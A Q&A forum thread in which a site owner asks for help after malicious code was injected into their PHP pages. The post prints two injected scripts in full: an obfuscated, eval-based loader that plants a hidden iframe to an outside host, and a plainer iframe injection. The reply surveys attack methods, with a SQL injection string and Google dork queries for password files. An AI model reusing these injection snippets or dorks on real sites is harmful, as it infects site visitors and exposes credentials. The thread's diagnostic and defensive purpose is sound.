Mobile app version of vmapp.org
Login or Join
Deb1703797

: Site got hacked while many / all security leaks have been removed I've got a website with this code appended to my php document : <? #8f4d8e#

@Deb1703797

Posted in: #Javascript #Php #Security #Virus

I've got a website with this code appended to my php document :

<? #8f4d8e #
echo " <script type="text/javascript" language="javascript" > //ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0146,0172,0146,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0146,0172,0146,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0144,0141,0171,0172,055,0151,0147,0151,056,0164,0153,057,0167,0160,055,0143,0157,0156,0164,0145,0156,0164,057,0143,0157,0165,0156,0164,0145,0162,056,0160,0150,0160,047,073,015,012,040,040,040,040,0146,0172,0146,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0146,0172,0146,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0146,0172,0146,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0146,0172,0146,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0146,0172,0146,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0146,0172,0146,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0146,0172,0146,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0146,0172,0146,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0146,0172,0146,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0146,0172,0146,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+479!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>";

#/8f4d8e#
?>


I removed all my php treatment (receiving POST and GET then dealing with it) the only references to GET or POST are secured using htmlspecialchars and stripslashes.

I removed as many external javascript tools as possible.

I though my website was minified to maximum for minimum security leak but it seams it didn't do its job has mentioned with the code up here...

Previously I add the following code injection (you'll see that the two injections are not the same ...)

/*68c8c7*/
//(function () { var id = '8'; var wtxmw09 = document.createElement('iframe'); wtxmw09.src = 'http://www.cittadinolibero.it/clk.php'; wtxmw09.style.position = 'absolute'; wtxmw09.style.border = '1'; wtxmw09.style.height = '31px'; wtxmw09.style.width = '42px'; wtxmw09.style.left = '500px'; wtxmw09.style.top = '100px'; if (!document.getElementById('wtxmw')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id='wtxmw' style="position:absolute; width:80%; height:100%;" ></div>'); document.getElementById('wtxmw').appendChild(wtxmw09); }})();
/*/68c8c7*/


Also, how could I scan all my code for security leaks I wouldn't have though about ?
I tried RIPS, but with level 1 tainting, I had no message...

What are the several ways a hacker could use to hack a website ? How ?

10.01% popularity Vote Up Vote Down


Login to follow query

More posts by @Deb1703797

1 Comments

Sorted by latest first Latest Oldest Best

 

@Nimeshi995

Your question is extremely broad because its a complete guessing game without reviewing your logs, setup and hardware.

But to answer your question as you've asked hackers can gain entry to websites normally using these commonly known methods.

SQL Injections

This most likely accounts for the most common of hacks is an SQL injection on the database to return string or enter a string to gain access. Most often sites that are hacked by SQL injections are often out of date content management systems or plugins that have access to SQL level.

Example of SQL injection is entering `OR 1=1 into a username login form and some sites return strings that then can be used to further the attack.

SQL injections are often run on:


Input Forms, Search Boxes, Logins, Etc.
URL's in Browser
Malicious Injection Files


You should research on ways of preventing SQL injections as well as looking at Dork Cheat Sheets.

Keyloggers

Key Loggers can be one of the most forgotten things when checking a website, there are plenty of viruses on the net and most often they come packed with keygens and other cracks for expensive games and applications.

Cross Site Scripting (XSS)

XSS or Cross Site Scripting is the other major vulnerability that hackers tend to go after particularly harder large sites such as Gmail, Hotmail and so on. This requires a lot more effort than SQL injections but hackers find it more rewarding. XSS prevention is pretty tricky to but worth researching if your sick and tired of being hacked or if you just want to prevent XSS hacks.

Authorization Bypass

Authorization Bypass is generally weak sites that are run on the same hosting and so a weaker site is gained access to obtain access to the harder site. Many uni's and government run sites are often hacked this way. A nice PDF about Authorization Bypass written by Michael Dalton at Stanford.

Google Hacking

Often Google will spider things that you don't want it to spider and this can leave undesirable results in Google search, example:

inurl:passlist.txt
inurl:passwd.txt
“login: *” “password= *” filetype:xls


You can check out the latest Google Dorks and Cheat Sheets here and read more about Google hacking on Wikipedia.

Password Cracking

This is less common due to the effort involved but it does have some effect on weaker sites, basically bots can brute force a website that uses weaker passwords to harder passwords but harder passwords take a long time, SSH servers are a great example of this, if you don't use key auth then they will run a brute force password cracker on it for days, weeks, months until it finds the correct logins.

One of the best prevention on this is to block IP X mins using mod_security and fail2ban on your linux box, but doesn't rule out if they are ciricling their IPS with a infinite supply of proxy's.

Poor Permissions

Why poor permissions is less common for actually gaining access to the server unless the files are writable by public in order to upload a script, strong premissions can be a great way of preventing additional files being touched. Even with SQL injections if you CHMOD your files correctly say on .htaccess, and the config file they will be unable to change without knowing your CPANEL or FTP password. I strongly recommend you research CHMOD its an awesome way of stopping hackers in and is also a last line defense once their in any can make things a lot easier to recover from.

More

I'm sure there are hundreds move ways they can gain access and one of the reason I added this as a community wiki.

10% popularity Vote Up Vote Down


Back to top | Use Dark Theme